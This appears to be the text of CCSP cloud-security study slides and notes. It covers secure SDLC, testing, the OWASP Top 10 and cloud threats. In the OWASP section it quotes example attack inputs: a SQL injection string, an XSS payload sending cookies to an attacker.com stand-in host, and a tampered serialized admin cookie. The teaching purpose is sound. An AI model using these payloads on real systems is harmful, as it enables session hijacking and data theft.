C. Security Testing (e.g., SAST, DAST, Pen Testing)
10. 2A. CLOUD-BASED FUNCTIONAL
DATA/TESTING
• “Functional data” refers to specific services your organization offers that have some
form of legal implication (e.g., regulatory requirements, contractual requirements,
etc.)
• Cloud providers are concerned about preventing customers from harming the cloud
enterprise and from accessing any other customers’ data or operation
• Cloud provider may allow customers to monitor and test data and behavior of the
network to ensure appropriate security controls are in place
• Monitoring may include access to audit and performance logs, delivering of SIEM
log data, deployment of a DLP solution, or access to a scaled-down, limited portion
of the cloud environment that mimics the overall infrastructure
11. 2B. CLOUD-SECURE SOFTWARE
DEVELOPMENT LIFECYCLE
• Several SDLC models:
• Waterfall
• Agile Development
• Spiral
• Others
• All SDLCs have steps similar to these:
• Planning and requirements analysis
• Defining
• Designing
• Developing
• Testing
• Maintenance:
• Operations (e.g., Puppet, Chef)
• Disposal
12. 2B. CLOUD-SECURE SDLC (CONT’D)
• For Cloud, best to use ISO/IEC 27034-1 (Information Technology – Security
Techniques – Application Security):
• Organizational Normative Framework (ONF)
• Continuous improvement loop with ANF: innovations resulting from securing a single application are
returned to the ONF to strengthen all organization application security in future
• Application Normative Framework (ANF)
• Used in conjunction with ONF, but created for a specific application
• Application Security Management Process (ASMP)
• To manage and maintain each ANF
• ONF to ANF is one-to-many relationship (one ONF is used as the basis to create
multiple ANFs)
• No official third-party certification process in place yet
13. 2C. APPLICATION SECURITY TESTING
• White-box testing vs black-box testing
• Static Application Security Testing (SAST)- white-box testing usually used while app is in dev
• Dynamic Application Security Testing (DAST)- black-box testing used while app is running
• Runtime application security testing (RASP) – prevents attacks by reconfiguring automatically
without human intervention in response to certain conditions
• Vulnerability Assessments – usually white-box test that identifies known vulnerabilities
• Penetration Testing
• Secure Code Reviews
14. 2C. APPLICATION SECURITY TESTING
(CONT’D)
• OWASP Recommendations:
• Identity management testing
• Authentication testing
• Authorization testing
• Session management testing
• Input validation testing
• Testing for error handling
• Testing for weak cryptography
• Business logic testing
• Client-side testing
• Chosen cloud deployment model (e.g., public vs private) may introduce new threat
vectors over traditional deployment
15. 3. USE VERIFIED SECURE SOFTWARE
A. Approved API
B. Supply-Chain Management
C. Community Knowledge
16. 3A. APPROVED API
• APIs are a very important part of cloud applications, as this is the primary access method
• Two of the possible formats for cloud APIs are:
• Representational State Transfer (REST)
• Uses HTTP
• Supports many data formats (e.g., JSON, XML, YAML, etc.)
• Good performance and scalability, uses caching
• Widely used
• Stateless
• Simple Object Access Protocol (SOAP)
• Uses SOAP envelope around HTTP, FTP, or SMTP
• Only supports XML
• Slower performance, complex scalability, no caching
• Used where REST is not possible
• Stateful
17. 3A. APPROVED API (CONT’D)
• APIs are a means for a company to expose functionality to applications
• Benefits:
• Programmatic control and access
• Automation
• Integration with third-party tools
• Use of APIs can lead to leveraging of insecure products outside corporate
boundaries; needs to be a formal approval process for all APIs
• To secure APIs, use SSL (REST) or message-level crypto-access (SOAP)
authentication, and log API usage; can also use OWASP’s Dependency-Check (to
check for known vulnerabilities in dependencies)
18. 3B. SOFTWARE SUPPLY CHAIN
MANAGEMENT
• More and more use of third-party software in the cloud
• Cloud has a highly dynamic software supply chain because so many applications
have unknown software components and are developed using uncertain
development processes
• Best if everyone produced software using guidance defined by ISO/IEC 27034-1 (but
there does not appear to be an official certification process yet)
• Would be great if orgs could access all code and services to verify proper and secure
functioning regardless of source
19. 3C. COMMUNITY KNOWLEDGE
• Open source software
• Openly tested and reviewed
• Considered to be more secure than software that has not undergone community
scrutiny
20. 4. COMPREHEND THE SDLC
PROCESS
A. Phases and Methodologies
B. Business Requirements
C. Software Configuration Management and Versioning
22. 4B. SDLC BUSINESS REQUIREMENTS
• Cloud Providers’ business requirements include:
• Be profitable
• Ensure all customer needs are met (i.e., Contracts and SLAs)
• Cloud Providers’ primary security concerns:
• Physical Plant or data center (campus, physical components, services)
• Logical Framework (secure installation and configuration of virtual OSs & other elements)
• Networking (firewalls, IDS/IPS, Honeypots, vulnerability assessments, communications
• Mapping and selection of controls (usually per regulations)
• DDoS prevention
• Cloud Customers need to define cloud strategy before entering into agreement with CSP
• Organizational assets agreed upon and assessed for suitability for cloud
• Define suitable business units or functions
• Outline phased approach to cloud journey
• Document exceptions, restrictions, and risks
• List regulatory and compliance components (addressed either jointly or by the provider)
• List business and system interdependencies
23. 4C. SDLC SOFTWARE CONFIGURATION
MANAGEMENT AND VERSIONING
• Carryover from on-premises: secure baseline configurations of the OS
• Create a secure OS baseline template to harden each new virtual machine deployment
• Exceptions should be approved by the change/configuration management process
• Version control for applications:
• Follow vendor recommendations
• Apply requisite patches and upgrades
• Ensure interoperability with the rest of the environment
• Document all changes and developments
24. 5. APPLY THE SECURE SDLC
A. Common Vulnerabilities (e.g., SQL Injection, XSS, XSRF, Direct Object Reference,
Buffer Overflow) – discussed earlier
B. Cloud-specific Risks
C. Quality of Service
D. Threat Modeling
25. 5A. COMMON VULNERABILITIES
(OWASP TOP 10 AGAIN)
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using components with Known Vulnerabilities
10. Insufficient Logging and Monitoring
26. 5A-1. INJECTION
• Definition: Occurs when an attacker can send hostile data to an interpreter as part of a
command or query
• Impact: Can result in data loss, corruption, or disclosure to unauthorized parties, loss of
accountability, denial of access, or complete host takeover
• Example: An application uses untrusted data in the construction of the following vulnerable
SQL call:
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + “’”;
The attacker modifies the ‘id’ parameter value in their browser to send: ' or '1'='1. For example:
http://example.com/app/accountView?id=' or '1'=‘1
This changes the meaning of both queries to return all the records from the accounts table.
More dangerous attacks could modify or delete data, or even invoke stored procedures.
27. 5A-2. BROKEN AUTHENTICATION
• Definition: authentication and session management is implemented incorrectly,
allowing attackers to compromise passwords, keys, or session tokens
• Impact: attackers only have to gain access to a few accounts to compromise the
system; results in money laundering, social security fraud, and identity theft
• Example: Most authentication attacks occur due to the continued use of passwords
as a sole factor. Once considered best practices, password rotation and complexity
requirements are viewed as encouraging users to use, and reuse, weak passwords.
Organizations are recommended to stop these practices per NIST 800-63 and use
multi-factor authentication.
28. 5A-3. SENSITIVE DATA EXPOSURE
• Definition: Sensitive data is not properly protected
• Impact: compromises regulated data such as PII, credentials, and credit cards
• Example: A site doesn't use or enforce TLS for all pages or supports weak
encryption. An attacker monitors network traffic (e.g. at an insecure wireless
network), downgrades connections from HTTPS to HTTP, intercepts requests, and
steals the user's session cookie. The attacker then replays this cookie and hijacks the
user's (authenticated) session, accessing or modifying the user's private data.
Instead of the above they could alter all transported data, e.g. the recipient of a
money transfer.
29. 5A-4. XML EXTERNAL ENTITIES (XXE)
• Definition: XML processor evaluates external entity references within XML
documents, which can be used to disclose internal files
• Impact: Can be used to extract data, execute a remote request from the server, scan
internal systems, or perform a DoS attack
• Example: An attacker attempts a denial-of-service attack by including a potentially
endless file
30. 5A-5. BROKEN ACCESS CONTROL
• Definition: Poorly enforced restrictions on what authenticated users are allowed to
do, allowing attackers to access unauthorized functionality and/or data
• Impact: Attackers can act as users or administrators, and can create, access, update,
or delete records
• Example: The application uses unverified data in a SQL call that is accessing account
information:
pstmt.setString(1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( );
An attacker simply modifies the 'acct' parameter in the browser to send whatever account
number they want. If not properly verified, the attacker can access any user's account.
31. 5A-6. SECURITY MISCONFIGURATION
• Definition: Insecure default configurations, incomplete configurations, open cloud
storage, misconfigured HTTP headers, and verbose error messages
• Impact: Often give attackers unauthorized access to system data or functionality,
and can result in a complete system compromise
• Example: A cloud service provider has default sharing permissions open to the
Internet by other CSP users. This allows sensitive data stored within cloud storage to
be accessed.
32. 5A-7. CROSS-SITE SCRIPTING (XSS)
• Definition: application includes untrusted data in a new web page without proper validation
or escaping, allowing attackers to execute scripts in the victim’s browser to hijack user
sessions, deface web sites, or redirect the user to malicious sites
• Impact: Can result in stealing of credentials and sessions, or delivering malware to the victim
• Example: The application uses untrusted data in the construction of the following HTML
snippet without validation or escaping:
(String) page += “<input name=‘creditcard’ thpe=‘TEXT’
value=‘“+request.getParameter(“CC”)+”>”;
The attacker modifies the ‘CC’ parameter in the browser to:
‘><script>document.location=‘http://www.attacker.com/cgi-
bin/cookie.cgi?foo=‘+document.cookie</script>’.
This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the
attacker to hijack the user’s current session.
33. 5A-8. INSECURE DESERIALIZATION
• Definition: Serialization refers to a process of converting an object into a format
which can be persisted to disk, sent through streams, or sent over a network (e.g.,
JSON, XML). Deserialization is the opposite.
• Impact: Can lead to remote code execution attacks or allowing replay attacks,
injection attacks, and privilege escalation attacks
• Example: A PHP forum uses PHP object serialization to save a "super" cookie,
containing the user's user ID, role, password hash, and other state:
a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
An attacker changes the serialized object to give themselves admin privileges:
a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
34. 5A-9. USING COMPONENTS WITH
KNOWN VULNERABILITIES
• Definition: Libraries, frameworks, and other modules with known vulnerabilities can
run with the same privilege as the application, which facilitates serious data loss or
server takeover during a breach
• Impact: Some of the largest breaches have relied on exploiting new vulnerabilities
• Example: CVE-2017-5638, a Struts 2 remote code execution vulnerability that
enables execution of arbitrary code on the server, has been blamed for significant
breaches.
35. 5A-10. INSUFFICIENT LOGGING AND
MONITORING
• Definition: Lengthens time to detect breaches, allowing attackers to further attack
systems, maintain persistence, pivot to more systems, and tamper, extract, or
destroy data
• Impact: Most successful attacks start with vulnerability probing. Allowing them to
continue can raise the likelihood of successful exploit.
• Example: A major US retailer reportedly had an internal malware analysis sandbox
analyzing attachments. The sandbox software had detected potentially unwanted
software, but no one responded to this detection. The sandbox had been producing
warnings for some time before the breach was detected due to fraudulent card
transactions by an external bank.
36. 5B. CLOUD-SPECIFIC RISKS
Application and Data sensitivity and importance (mentioned previously) :
• To determine sensitivity and importance of an application you are considering to
put into a cloud environment, ask yourself what the impact would be in the
following situations:
• The data became widely public and widely distributed (including crossing geographic
boundaries)
• An employee of the cloud service provider accessed the application
• The process or function was manipulated by an outsider
• The process or function failed to provide expected results
• The data was unexpectedly changed
• The application was unavailable for a period of time
37. 5B. CLOUD-SPECIFIC RISKS (CONT’D)
CSA Treacherous Twelve of 2016:
1. Data Breaches
2. Weak Identity, Credential and Access Management
3. Insecure Interfaces and APIs
4. System and Application Vulnerabilities
5. Account Hijacking
6. Malicious Insiders
7. Advanced Persistent Threats (APTs)
8. Data Loss
9. Insufficient Due Diligence
10. Abuse and Nefarious Use of Cloud Services
11. Denial of Service
12. Shared Technology Issues
38. 5B-1. DATA BREACHES
• Definition: an incident in which sensitive, protected or confidential information is
released, viewed, stolen or used by an individual who is not authorized to do so
• Impact: the sensitivity of the data determines the extent of the damage; could
involve fines, civil lawsuits, or criminal charges
• Example: The 2015 Anthem breach of more than 80 million customer records began
with stolen credentials on the corporate network. A third-party cloud service was
used to transfer the huge data store from the company’s network to the public
cloud where it could be downloaded by the hackers.
39. 5B-2. WEAK IDENTITY, CREDENTIAL,
AND ACCESS MANAGEMENT
• Definition: lack of scalable identity access management systems, failure to use
multifactor authentication, weak password use, lack of ongoing automated rotation
of cryptographic keys, passwords, and certificates, and insecure storage of
cryptographic keys
• Impact: can enable unauthorized access to data and potentially catastrophic
damage to organizations or end users
• Example: Attackers Scrape GitHub for Cloud Service Credentials, Hijack Account to
Mine Virtual Currency – “Cloud service provider credentials included in a GitHub
project were discovered and misused within 36 hours of the project going live.”
40. 5B-3. INSECURE INTERFACES AND
APIS
• Definition: APIs and UIs are generally the most exposed part of a system, and will be
the target of heavy attack
• Impact: reliance on a weak set of interfaces and APIs exposes organizations to a
variety of security issues related to confidentiality, integrity, availability, and
accountability
• Example: The IRS Breach and the Importance of Adaptive API Security – “In mid-
2015, the US Internal Revenue Service (IRS) exposed over 300,000 records via a
vulnerable API (“Get Transcript”).”
41. 5B-4. SYSTEM AND APPLICATION
VULNERABILITIES
• Definition: Exploitable bugs in programs that attackers can use to infiltrate a
computer system for the purpose of stealing data, taking control of the system, or
disrupting service operations
• Impact: the costs of implementing protection are small in comparison to the costs of
the damage they can cause
• Example: Verizon 2015 Data Breach Investigations Report – “The Shellshock bug in
Bash was 2014’s second tumultuous OSS vulnerability event, quickly eclipsing
Heartbleed due to many more successful attacks.”
42. 5B-5. ACCOUNT HIJACKING
• Definition: Phishing, fraud, and exploitation of software vulnerabilities to obtain
credentials and passwords
• Impact: attackers can access critical areas of cloud computing services, allowing
them to compromise the confidentiality, integrity, and availability of those services
• Example: In June 2014, Code Spaces’ Amazon AWS account was compromised when
it failed to protect the administrative console with multifactor authentication. All the
company’s assets were destroyed, putting it out of business.
43. 5B-6. MALICIOUS INSIDERS
• Definition: CERN defines an insider threat as follows: “A malicious insider threat to
an organization is a current or former employee, contractor, or other business
partner who has or had authorized access to an organization’s network, system, or
data and intentionally exceeded or misused that access in a manner that negatively
affected the confidentiality, integrity, or availability of the organization’s information
or information systems.”
• Impact: a malicious insider can gain increasing levels of access to more critical
systems and eventually to data. Systems that depend solely on the CSP for security
are at greater risk here.
• Example: Cloud’s Privileged Identity Gap Intensifies Insider Threats – “Organizations
need to rein in shared accounts and do a better job tracking user activity across
cloud architectures.”
44. 5B-7. ADVANCED PERSISTENT
THREATS (APTS)
• Definition: a parasitical form of cyberattack that infiltrates systems to establish a foothold in
the computing infrastructure of target companies from which they smuggle data and
intellectual property. APTs pursue their goals stealthily over extended periods of time.
Spearphishing, direct hacking systems, delivering attack code through USB devices,
penetration through partner networks, and use of unsecured or third-party networks are
common points of entry for APTs.
• Impact: Combatting complex APTs may require more advanced security controls, process
management, incident response plans, and IT staff training, which can lead to increased
budgets.
• Example: Carbanak: How Would You Have Stopped a $1 Billion APT Attack? – “… Carbanak,
an APT attack against financial institutions around the world, may well be considered the
largest cyberheist to date. … Unlike the usual cybercriminal method of stealing consumer
credentials or compromising individual online banking sessions with malware, the brazen
Carbanak gang targeted banks’ internal systems and operations, resulting in a multichannel
robbery that averaged $8 million per bank.”
45. 5B-8. DATA LOSS
• Definition: permanent loss of access to data through destruction or loss of capability
to read it (e.g., loss of encryption key)
• Impact: Can affect compliance status or even force company out of business
• Example: In November 2014, attackers broke into Sony and leaked confidential
information such as PII and email exchanges among Sony employees. In the first
quarter 2015, Sony set aside USD $15 million to address ongoing damages from the
hack.
46. 5B-9. INSUFFICIENT DUE DILIGENCE
• Definition: An organization that rushes to adopt cloud technologies and choose
CSPs without performing due diligence exposes itself to a myriad of commercial,
financial, technical, legal and compliance risks that jeopardize its success.
• Impact: CSP may not have same priorities as customer regarding services; there may
be unknown technical issues; data in foreign locations may subject company to legal
redress; security and privacy controls may “disappear”
• Example: M&A – In 2011, Facebook settled FTC charges that it deceived consumers
by failing to keep its privacy promises. Under the terms of the FTC’s order, Facebook
must get consumer’s’ affirmative consent before making changes that override their
privacy settings, among other requirements.
47. 5B-10. ABUSE AND NEFARIOUS USE
OF CLOUD SERVICES
• Definition: Malicious actors may leverage cloud computing resources to target
users, organizations or other cloud providers. Examples of misuse of cloud service-
based resources include launching DDoS attacks, email spam, and phishing
campaigns; “mining” for digital currency; large-scale automated click fraud; brute-
force compute attacks of stolen credential databases; and hosting of malicious or
pirated content.
• Impact: Can reduce available capacity, pass increased costs along , and cause
business disruption for innocent cloud customers
• Example: The DDoS That Almost Broke the Internet – “The attackers were able to
generate more than 300 Gbps of traffic likely with a network of their own that only
had access to 1/100th of that amount of traffic themselves.”
48. 5B-11. DENIAL OF SERVICE
• Definition: Intended to prevent users of a service from being able to access their
data or applications by forcing the targeted cloud service to consume inordinate
amounts of finite system resources.
• Impact: Experiencing a denial-of-service attack is like being caught in rush-hour
traffic gridlock: there is no way to get to your destination, and there is nothing you
can do about it except sit and wait.
• Example: Feedly Knocked Offline by DDoS Attack Following Evernote and Deezer
Attacks – “In what looks like a series of co-ordinated cyber-attacks by a criminal
gang, three major cloud-based services have all been knocked offline in recent days.
News aggregator Feedly, note-taking app Evernote and music streaming service
Deezer have all come under attack from criminals in the last few days leading to all
three suffering service outages.
49. 5B-12. SHARED TECHNOLOGY
ISSUES
• Definition: Underlying components (e.g., CPU caches, GPUs, etc.) that comprise the
infrastructure supporting cloud services deployment may not have been designed to offer
strong isolation properties for a multitenant architecture (IaaS), re-deployable platforms
(PaaS) or multicustomer applications (SaaS). This can lead to shared technology
vulnerabilities that can potentially be exploited in all delivery models. The key is that a single
vulnerability or misconfiguration can lead to a compromise across an entire provider’s cloud.
• Impact: A compromise of shared technology exposes the entire environment to a potential
compromise and breach.
• Example: Cross-VM Side Channels and Their Use to Extract Private Keys – “…construction of
an access-driven side-channel attack by which a malicious virtual machine (VM) extracts fine-
grained information from a victim VM running on the same physical computer.”
50. 5C. QUALITY OF SERVICE
• Ensure you don’t over-control the cloud environment with security measures that
degrade the application’s performance
• Examples:
• Encryption
• Host-based Intrusion Detection systems on servers (agents on VMs)
• Only use security controls that are needed and adequate to reduce risk to
acceptable levels
51. 5D. THREAT MODELING
• Should be performed when application design is created
• Goal is to determine any weaknesses in the application before deployment
• STRIDE – system for classifying known threats according to kind of exploit or
motivation of attacker:
• Spoofing – any impersonation such as IP or user spoofing
• Tampering – with data output, data input, or data that is stored
• Repudiation – when the inability to deny one’s actions has been compromised
• Information disclosure – data leakage or an outright breach
• Denial of Service – any type of attack that could cause the application to be unavailable,
thereby voiding the CIA triangle of security
• Elevation of Privilege – the ability to elevate a user account privilege above the
authorized level
52. 6. CLOUD APPLICATION
ARCHITECTURE
A. Supplementary Security Devices (e.g., WAF, DAM, XML Firewalls, API Gateway)
B. Cryptography (e.g., TLS, SSL, IPSEC)
C. Sandboxing
D. Application Virtualization
53. 6A. SUPPLEMENTAL SECURITY
DEVICES
• Defense in Depth:
• Firewall – port blocking, unrequested inbound traffic prevention
• Web application firewall (WAF) – designed to protect specific web-based applications
(required by PCI)
• Database activity monitoring (DAM) – watches databases for unusual requests or activity
and send alerts or take action to stop it
• Deception Technology (“Honeypot”) – works in conjunction with WAFs and DAMs which
reroute unusual traffic to the honeypot to capture the attack
• API gateway – imposes controls on API activity (e.g., access control, connection limits,
etc.))
• XML gateway - works around how sensitive data and services are exposed to APIs, and
can implement DLP
54. 6B. CRYPTOGRAPHY
• Data held within and communicated to and between systems and services operating in the
cloud should be encrypted
• Encryption modes:
• Data at rest
• Whole instance encryption (encrypting entire storage medium)
• Volume encryption (encrypting a partition on a hard drive)
• File or directory encryption (in case disk or volume is breached)
• Data in transit
• Transport Layer Security (TLS) – successor to SSL
• Secure Sockets Layer (SSL) – deprecated by TLS
• Virtual Private Network (VPN) – such as IPSec gateway (encrypted) or MPLS (unencrypted)
• Data in Use
• Homomorphic Encryption (might not be on the CCSP test because this is so new)
55. 6B. CRYPTOGRAPHY (CONT’D)
• Data Masking/Obfuscation
• Keeps the format of a data string, but alters the content
• For example, showing only the last four digits of a Social Security number
• Tokenization
• Generates a token, such as a string of characters, that is used to substitute for sensitive
data, which is stored in a secured location (e.g., database)
• When accessed by a non-authorized entity, only the token string is shown, not the actual
data
• Often used to satisfy PCI DSS requirements for credit card processing
56. 6C. SANDBOXING
• Isolates and utilizes only the intended components
• For example, storing and accessing personal information in one sandbox, and
corporate information in another sandbox
• For cloud environments, typically used to run untested or untrusted code in a tightly
controlled environment
• Can be used to understand how an application works, or to test applications by
executing them and observing the file behavior for indications of malicious activity
57. 6D. APPLICATION VIRTUALIZATION
• Creates a virtual environment for an application to run in
• Goal is to test applications while protecting the OS and other applications
• Examples:
• Wine (allows a Microsoft application to run on a Linux platform)
• Microsoft App-V
• XenApp
• Methods to assess security of virtualized applications:
• Software assurance
• Verification and Validation (e.g. Threat Modeling/STRIDE)
58. 7. DESIGN APPROPRIATE IAM
SOLUTIONS
• Federated Identity
• Identity Providers
• Single Sign-On
• Multi-factor Authentication
60. 7 (CONT’D). IDENTITY REPOSITORY
AND DIRECTORY SERVICES
• Identity repositories provide directory services for the administration of user
accounts and their attributes.
• Common Directory Services:
• X.500 and LDAP
• Microsoft Active Directory
• Novell eDirectory
• Metadata replication and synchronization
• Directory as a Service
61. 7A. FEDERATED IDENTITY
MANAGEMENT
• Provides the policies, processes, and mechanisms that manage identity and trusted
access to systems ACROSS ORGANIZATIONS
• Similar to Kerberos, but for separate domains
• Federation Standards:
• Security Assertion Markup Language (SAML) (most used)
• WS-Federation (OASIS)
• OpenID Connect (based on OAuth 2.0)
• OAuth (for web and mobile applications)
• Shibboleth (used in the education space)
62. 7B. IDENTITY PROVIDERS
• Federated Identity Providers
• Identity Provider – holds all the identities and generates a token for known users
• Relying Party – the service provider who consumes these tokens
63. 7C. SINGLE SIGN-ON
• Single Sign-on
• For signing in once to many applications within an organization
• Implemented similarly to on-premises solutions, except on virtual machines rather than
physical
• Federated Identity Management/Federated Single Sign-On
• Used for facilitating interorganizational and intersecurity domain access to resources
leveraging federated identity management
64. 7D. MULTIFACTOR
AUTHENTICATION
• Also called two-factor authentication or strong authentication
• Users must be able to provide at least two of the following requirements:
• Something they know (e.g., password)
• Something they have (e.g., display token with random numbers)
• Something they are (e.g., biometrics such as finger print or retinal scan)
• Includes one-time passwords
• Step-up authentication:
• Challenge questions
• Out-of-band authentication (e.g., SMS)
• Dynamic knowledge-based authentication (questions unique to end user)
65. REFERENCES
• The Official (isc)2 Guide to the CCSP CBK, second edition by Adam Gordon, 2016
• (isc)2 Certified Cloud Security Professional Official Study Guide by Brian T. O’Hara
and Ben Malisow, 2017
• The Treacherous 12 Cloud Computing Threats in 2016, Cloud Security Alliance,
February 2016
• The Open Web Application Security Project (OWASP), Top 10 – 2017, The Ten Most
Critical Web Application Security Risks
WINE: application virtualization platform that provides a linux machine with the ability to run Windows-based applications
On premise doesn’t transfer because:
on-premises apps not developed with cloud-based svcs in mind. Often legacy technologies are not supported in the cloud
not all apps can be fork-lifted (migrating entire application the way it runs in a traditional infrastructure with minimal code changes) to the cloud. Traditional apps are self-contained and have few dependencies, whereas cloud apps have more interdependencies (e.g., virtual environments, supply chain APIs, payment gateways, advertising, etc.).
Many high-end apps are expensive to replace, and were developed in legacy code (e.g., COBOL). They are not easy to modify to be cloud-ready
Developers may not be familiar with technologies that are better used in the cloud (e.g., virtual environments)
Because cloud services are evolving so rapidly, documentation is falling behind
Integration with cloud services can be complicated; best to use the CSP’s APIs
Need to understand cloud service and deployment models and who is responsible for security controls in each
Need visibility into who is accessing the application and the actions they are performing (need to get metrics)
Planning and requirements analysis: determine business (functional and non-functional) and security standards; quality assurance requirements, identification of risks
Defining: Define and document product requirements and get customer approval
Designing: specify hardware and system requirements and overall system architecture; threat modeling and secure design elements discussed
Developing: Divide work into modules or units and start actual coding; conduct code review, unit testing, acceptance testing
Testing: unit testing, integration testing, system testing, and acceptance testing
Maintenance/Secure Operations: goal is to ensure configurations are updated and versioning is consistent; tools include Puppet (enforces configurations) and Chef (stores configurations and updates clients when necessary); activities: dynamic analysis, vulnerability assessments, pen testing, activity monitoring, web app firewalls
Maintenance/Disposal: crypto-shredding (delete key used to encrypt data stored in cloud)
SAST – test performs an analysis of the application source code, byte code, and binaries without executing the application code; can be used to find XSS errors, SQL injection, buffer overflows, unhandled error conditions, and potential backdoors
DAST – tool discovers individual execution paths in the application being analyzed; considered effective when testing exposed HTTP and HTML interfaces
RASP – runtime environment has full visibility into application logic, configuration, and data and event flows; prevents attacks by self-protecting or reconfiguring automatically without human intervention in response to certain conditions (threats, faults, etc.); currently exists for Java virtual machine and .NET Common Language Runtime; self-protection measures include: user session termination, application termination, alert sent to security personnel or user; example of condition that would trigger a response is SQL injection;
Vuln testing and pen testing – most Cloud vendors allow this to be done depending on service model: SaaS probably won’t allow pen testing;
Secure code reviews – formal and informal; should be part of SDLC
Planning and requirements analysis: determine business (functional and non-functional) and security standards; quality assurance requirements, identification of risks
Defining: Define and document product requirements and get customer approval
Designing: specify hardware and system requirements and overall system architecture; threat modeling and secure design elements discussed
Developing: Divide work into modules or units and start actual coding; conduct code review, unit testing, acceptance testing
Testing: unit testing, integration testing, system testing, and acceptance testing
Maintenance/Secure Operations: goal is to ensure configurations are updated and versioning is consistent; tools include Puppet (enforces configurations) and Chef (stores configurations and updates clients when necessary); activities: dynamic analysis, vulnerability assessments, pen testing, activity monitoring, web app firewalls
Maintenance/Disposal: crypto-shredding (delete key used to encrypt data stored in cloud)